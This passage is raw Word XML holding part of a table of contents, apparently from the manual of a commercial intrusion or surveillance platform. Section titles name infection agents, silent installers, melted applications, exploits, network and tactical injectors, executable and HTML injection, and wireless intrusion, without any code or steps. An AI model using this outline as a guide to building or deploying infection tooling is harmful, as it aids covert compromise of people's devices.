            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15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3" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Intelligence Logic and Capabilities</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642483 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15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4" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Entities and Links Creation</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642484 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</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485" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Desktop Factories Configuration</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642485 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>20</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6" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Desktop Factories Introduction</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642486 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>20</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7" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Desktop Events Configuration</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642487 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>22</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8" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Desktop Actions Configuration</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642488 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>28</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89" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Desktop Modules Configuration</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642489 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>32</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490" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Desktop Infection Agents</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642490 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>39</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91" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Silent Installer Explanation</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642491 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>40</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92" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Melted Application Explanation</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642492 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>41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93" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>U3 Installation Explanation</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642493 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>42</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94" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Offline Installation Explanation</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642494 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>43</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="003F3DE1" w:rsidRDefault="003A4380">
          <w:pPr>
            <w:pStyle w:val="Sommario3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc372642495" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>How to: Make a USB Disk Bootable</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642495 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>44</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96" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Exploit Explanation</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642496 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>45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97" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Network Injector Explanation</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642497 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>46</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498" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Tactical Network Injector (TNI)</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642498 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>47</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499" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Tactical Control Center Overview</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642499 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>49</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0" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Rules Creation and Configuration</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642500 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>50</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1" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Target Identification Methods</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642501 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>51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2" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>INJECT-EXE Infection Explanation</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642502 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>52</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3" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>INJECT-HTML-FLASH Infection Explanation</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642503 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>53</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4" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>INJECT-HTML-FILE Infection Explanation</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642504 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>54</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5" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>REPLACE Infection Explanation</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642505 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>55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6" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Wireless Intruder Usage</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
